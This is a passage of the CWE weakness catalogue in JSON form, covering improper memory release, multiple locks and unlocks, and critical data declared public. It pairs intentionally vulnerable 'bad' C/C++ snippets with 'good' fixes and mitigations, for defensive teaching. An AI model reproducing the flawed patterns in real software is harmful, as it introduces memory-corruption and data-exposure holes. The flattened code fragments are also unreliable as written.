operator."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"763","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Only call matching memory management functions. Do not mix and match routines. For example, when you allocate a buffer with malloc(), dispose of the original pointer with free()."},{"attr":{"@_Mitigation_ID":"MIT-41"},"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Choose a language or tool that provides automatic memory management, or makes manual memory management less error-prone.","For example, glibc in Linux provides protection against free of invalid pointers.","When using Xcode to target OS X or iOS, enable automatic reference counting (ARC) [REF-391].","To help correctly and consistently manage memory when programming in C++, consider using a smart pointer class such as std::auto_ptr (defined by ISO/IEC ISO/IEC 14882:2003), std::shared_ptr and std::unique_ptr (specified by an upcoming revision of the C++ standard, informally referred to as C++ 1x), or equivalent solutions such as Boost."]}},{"attr":{"@_Mitigation_ID":"MIT-4.6"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, glibc in Linux provides protection against free of invalid pointers."]}},{"Phase":"Architecture and Design","Description":"Use a language that provides abstractions for memory allocation and deallocation."},{"Phase":"Testing","Description":"Use a tool that dynamically detects memory management problems, such as valgrind."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-80"},"Intro_Text":"This example allocates a BarObj object using the new operator in C++, however, the programmer then deallocates the object using free(), which may lead to unexpected behavior.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BarObj *ptr = new BarObj()...free(ptr);","xhtml:br":["","","","",""],"xhtml:i":"/* do some work with ptr here */"}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BarObj *ptr = new BarObj()...delete ptr;","xhtml:br":["","","","",""],"xhtml:i":"/* do some work with ptr here */"}}}}],"Body_Text":"Instead, the programmer should have either created the object with one of the malloc family functions, or else deleted the object with the delete operator."},{"attr":{"@_Demonstrative_Example_ID":"DX-85"},"Intro_Text":"In this example, the program does not use matching functions such as malloc/free, new/delete, and new[]/delete[] to allocate/deallocate the resource.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class A {};void A::foo(){}","xhtml:div":[{"#text":"void foo();","attr":{"@_style":"margin-left:10px;"}},{"#text":"int *ptr;ptr = (int*)malloc(sizeof(int));delete ptr;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}}},{"attr":{"@_Demonstrative_Example_ID":"DX-86"},"Intro_Text":"In this example, the program calls the delete[] function on non-heap memory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class A{};void A::foo(bool heap) {}","xhtml:div":[{"#text":"void foo(bool);","attr":{"@_style":"margin-left:10px;"}},{"#text":"int localArray[2] = {};int *p = localArray;if (heap){}delete[] p;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"11,22","attr":{"@_style":"margin-left:10px;"}},{"#text":"p = new int[2];","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","",""]}],"xhtml:br":""}}}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"WIN30-C","Entry_Name":"Properly pair allocation and deallocation functions","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-657"}},{"attr":{"@_External_Reference_ID":"REF-480"}},{"attr":{"@_External_Reference_ID":"REF-391"}}]},"Notes":{"Note":{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This weakness is possible in any programming language that allows manual management of memory."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Martin Sebor","Contribution_Organization":"Cisco Systems, Inc.","Contribution_Date":"2010-04-30","Contribution_Comment":"Provided improvement to existing Mitigation"}}},"763":{"attr":{"@_ID":"763","@_Name":"Release of Invalid Pointer or Reference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application attempts to return a memory resource to the system, but calls the wrong release function or calls the appropriate release function incorrectly.","Extended_Description":{"xhtml:p":"This weakness can take several forms, such as:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The memory was allocated, explicitly or implicitly, via one memory management method and deallocated using a different, non-compatible function (CWE-762).","The function calls or memory management routines chosen are appropriate, however they are used incorrectly, such as in CWE-761."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands"],"Note":"This weakness may result in the corruption of memory, and perhaps instructions, possibly leading to a crash. If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Only call matching memory management functions. Do not mix and match routines. For example, when you allocate a buffer with malloc(), dispose of the original pointer with free()."},{"Phase":"Implementation","Description":"When programming in C++, consider using smart pointers provided by the boost library to help correctly and consistently manage memory."},{"attr":{"@_Mitigation_ID":"MIT-4.6"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, glibc in Linux provides protection against free of invalid pointers."]}},{"Phase":"Architecture and Design","Description":"Use a language that provides abstractions for memory allocation and deallocation."},{"Phase":"Testing","Description":"Use a tool that dynamically detects memory management problems, such as valgrind."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-78"},"Intro_Text":"This code attempts to tokenize a string and place it into an array using the strsep function, which inserts a \\\\0 byte in place of whitespace or a tab character. After finishing the loop, each string in the AP array points to a location within the input string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char **ap, *argv[10], *inputstring;for (ap = argv; (*ap = strsep(&amp;inputstring, \\" \\\\t\\")) != NULL;)/.../free(ap[4]);","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (**ap != \'\\\\0\')","xhtml:div":{"#text":"if (++ap &gt;= &amp;argv[10])","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"break;","attr":{"@_style":"margin-left:10px;"}}}}}}},"Body_Text":"Since strsep is not allocating any new memory, freeing an element in the middle of the array is equivalent to free a pointer in the middle of inputstring."},{"attr":{"@_Demonstrative_Example_ID":"DX-80"},"Intro_Text":"This example allocates a BarObj object using the new operator in C++, however, the programmer then deallocates the object using free(), which may lead to unexpected behavior.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BarObj *ptr = new BarObj()...free(ptr);","xhtml:br":["","","","",""],"xhtml:i":"/* do some work with ptr here */"}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BarObj *ptr = new BarObj()...delete ptr;","xhtml:br":["","","","",""],"xhtml:i":"/* do some work with ptr here */"}}}}],"Body_Text":"Instead, the programmer should have either created the object with one of the malloc family functions, or else deleted the object with the delete operator."},{"attr":{"@_Demonstrative_Example_ID":"DX-77"},"Intro_Text":"In this example, the programmer dynamically allocates a buffer to hold a string and then searches for a specific character. After completing the search, the programmer attempts to release the allocated memory and return SUCCESS or FAILURE to the caller. Note: for simplification, this example uses a hard-coded \\"Search Me!\\" string and a constant string length of 20.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define SUCCESS (1)#define FAILURE (0)int contains_char(char c){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *str;str = (char*)malloc(20*sizeof(char));strcpy(str, \\"Search Me!\\");while( *str != NULL){}free(str);return FAILURE;","xhtml:br":["","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( *str == c ){}str = str + 1;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free(str);return SUCCESS;","xhtml:br":["","",""],"xhtml:i":"/* matched char, free string and return success */"}},"xhtml:br":["","",""],"xhtml:i":"/* didn\'t match yet, increment pointer and try next char */"}},"xhtml:i":"/* we did not match the char in the string, free mem and return failure */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"#define SUCCESS (1)#define FAILURE (0)int cointains_char(char c){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char *str;int i = 0;str = (char*)malloc(20*sizeof(char));strcpy(str, \\"Search Me!\\");while( i &lt; strlen(str) ){}free(str);return FAILURE;","xhtml:br":["","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( str[i] == c ){}i = i + 1;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free(str);return SUCCESS;","xhtml:br":["","",""],"xhtml:i":"/* matched char, free string and return success */"}},"xhtml:br":["","",""],"xhtml:i":"/* didn\'t match yet, increment pointer and try next char */"}},"xhtml:i":"/* we did not match the char in the string, free mem and return failure */"}}}}],"Body_Text":["However, if the character is not at the beginning of the string, or if it is not in the string at all, then the pointer will not be at the start of the buffer when the programmer frees it.","Instead of freeing the pointer in the middle of the buffer, the programmer can use an indexing pointer to step through the memory or abstract the memory calculations by using array indexing."]},{"attr":{"@_Demonstrative_Example_ID":"DX-79"},"Intro_Text":"Consider the following code in the context of a parsing application to extract commands out of user data. The intent is to parse each command and add it to a queue of commands to be executed, discarding each malformed entry.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* input = (char*) malloc(40*sizeof(char));char *tok;char* sep = \\" \\\\t\\";get_user_input( input );tok = strtok( input, sep);while( NULL != tok ){}","xhtml:br":["","","","","","","","","","",""],"xhtml:i":["//hardcode input length for simplicity","/* The following loop will parse and process each token in the input string */"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( isMalformed( tok ) ){}else{}tok = strtok( NULL, sep));","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"free( tok );","xhtml:br":["",""],"xhtml:i":"/* ignore and discard bad data */"}},{"#text":"add_to_command_queue( tok );","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"char* input = (char*) malloc(40*sizeof(char));char *tok, *command;char* sep = \\" \\\\t\\";get_user_input( input );tok = strtok( input, sep);while( NULL != tok ){}free( input )","xhtml:br":["","","","","","","","","","","","",""],"xhtml:i":["//hardcode input length for simplicity","/* The following loop will parse and process each token in the input string */"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( !isMalformed( command ) ){}tok = strtok( NULL, sep));","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"command = (char*) malloc( (strlen(tok) + 1) * sizeof(char) );strcpy( command, tok );add_to_command_queue( command );","xhtml:br":["","","",""],"xhtml:i":"/* copy and enqueue good data */"}},"xhtml:br":""}}}}],"Body_Text":["While the above code attempts to free memory associated with bad commands, since the memory was all allocated in one chunk, it must all be freed together.","One way to fix this problem would be to copy the commands into a new memory location before placing them in the queue. Then, after all commands have been processed, the memory can safely be freed."]}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-657"}},{"attr":{"@_External_Reference_ID":"REF-480"}}]},"Notes":{"Note":{"#text":"The view-1000 subtree that is associated with this weakness needs additional work. Several entries will likely be created in this branch. Currently the focus is on free() of memory, but delete and other related release routines may require the creation of intermediate entries that are not specific to a particular function. In addition, the role of other types of invalid pointers, such as an expired pointer, i.e. CWE-415 Double Free and release of uninitialized pointers, related to CWE-457.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"764":{"attr":{"@_ID":"764","@_Name":"Multiple Locks of a Critical Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software locks a critical resource more times than intended, leading to an unexpected state in the system.","Extended_Description":"When software is operating in a concurrent environment and repeatedly locks a critical resource, the consequences will vary based on the type of lock, the lock\'s implementation, and the resource being protected. In some situations such as with semaphores, the resources are pooled and extra locking calls will reduce the size of the total available pool, possibly leading to degraded performance or a denial of service. If this can be triggered by an attacker, it will be similar to an unrestricted lock (CWE-412). In the context of a binary lock, it is likely that any duplicate locking attempts will never succeed since the lock is already held and progress may not be possible.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":["DoS: Resource Consumption (CPU)","DoS: Crash, Exit, or Restart","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When locking and unlocking a resource, try to be sure that all control paths through the code in which the resource is locked one or more times correspond to exactly as many unlocks. If the software acquires a lock and then determines it is not able to perform its intended behavior, be sure to release the lock(s) before waiting for conditions to improve. Reacquire the lock(s) before trying again."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP21","Entry_Name":"Multiple locks/unlocks"}},"Notes":{"Note":{"#text":"An alternate way to think about this weakness is as an imbalance between the number of locks / unlocks in the control flow. Over the course of execution, if each lock call is not followed by a subsequent call to unlock in a reasonable amount of time, then system performance may be degraded or at least operating at less than peak levels if there is competition for the locks. This entry may need to be modified to reflect these concepts in the future.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"765":{"attr":{"@_ID":"765","@_Name":"Multiple Unlocks of a Critical Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software unlocks a critical resource more times than intended, leading to an unexpected state in the system.","Extended_Description":"When software is operating in a concurrent environment and repeatedly unlocks a critical resource, the consequences will vary based on the type of lock, the lock\'s implementation, and the resource being protected. In some situations such as with semaphores, the resources are pooled and extra calls to unlock will increase the count for the number of available resources, likely resulting in a crash or unpredictable behavior when the system nears capacity.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":["DoS: Crash, Exit, or Restart","Modify Memory","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When locking and unlocking a resource, try to be sure that all control paths through the code in which the resource is locked one or more times correspond to exactly as many unlocks. If the software acquires a lock and then determines it is not able to perform its intended behavior, be sure to release the lock(s) before waiting for conditions to improve. Reacquire the lock(s) before trying again."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-0935","Description":"Attacker provides invalid address to a memory-reading function, causing a mutex to be unlocked twice","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0935"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP21","Entry_Name":"Multiple locks/unlocks"}},"Notes":{"Note":{"#text":"An alternate way to think about this weakness is as an imbalance between the number of locks / unlocks in the control flow. Over the course of execution, if each lock call is not followed by a subsequent call to unlock in a reasonable amount of time, then system performance may be degraded or at least operating at less than peak levels if there is competition for the locks. This entry may need to be modified to reflect these concepts in the future.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"766":{"attr":{"@_ID":"766","@_Name":"Critical Data Element Declared Public","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software declares a critical variable, field, or member to be public when intended security policy requires it to be private.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality"],"Impact":["Read Application Data","Modify Application Data"],"Note":"Making a critical variable public allows anyone with access to the object in which the variable is contained to alter or read the value."},{"Scope":"Other","Impact":"Reduce Maintainability"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Data should be private, static, and final whenever possible. This will assure that your code is protected by instantiating early, preventing access, and preventing tampering."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example declares a critical variable public, making it accessible to anyone with access to the object in which it is contained.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":"public: char* password;"},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":"private: char* password;"}],"Body_Text":["Instead, the critical data should be declared private.","Even though this example declares the password to be private, there are other possible issues with this implementation, such as the possibility of recovering the password from process memory (CWE-257)."]},{"Intro_Text":"The following example shows a basic user account class that includes member variables for the username and password as well as a public constructor for the class and a public method to authorize access to the user account.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"#define MAX_PASSWORD_LENGTH 15#define MAX_USERNAME_LENGTH 15class UserAccount{};","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public:int authorizeAccess(char *username, char *password){}char username[MAX_USERNAME_LENGTH+1];char password[MAX_PASSWORD_LENGTH+1];","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"UserAccount(char *username, char *password){}","xhtml:br":"","xhtml:div":{"#text":"if ((strlen(username) &gt; MAX_USERNAME_LENGTH) ||(strlen(password) &gt; MAX_PASSWORD_LENGTH)) {}strcpy(this-&gt;username, username);strcpy(this-&gt;password, password);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"ExitError(\\"Invalid username or password\\");","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if ((strlen(username) &gt; MAX_USERNAME_LENGTH) ||(strlen(password) &gt; MAX_PASSWORD_LENGTH)) {}if (strcmp(this-&gt;username, username) ||strcmp(this-&gt;password, password))else","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Invalid username or password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"return 0;","attr":{"@_style":"margin-left:10px;"}},{"#text":"return 1;","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":["// if the username and password in the input parameters are equal to","// the username and password of this account class then authorize access","// otherwise do not authorize access"]}}],"xhtml:br":["","","","","",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"class UserAccount{public:private:};","xhtml:br":["","","",""],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"char username[MAX_USERNAME_LENGTH+1];char password[MAX_PASSWORD_LENGTH+1];","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}],"Body_Text":"However, the member variables username and password are declared public and therefore will allow access and changes to the member variables to anyone with access to the object. These member variables should be declared private as shown below to prevent unauthorized access and changes."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2010-3860","Description":"variables declared public allows remote read of system properties such as user name and home directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3860"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to protect stored data from modification"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ01-J","Entry_Name":"Declare data members as private and provide accessible wrapper methods"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"},{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-15"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-15"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated 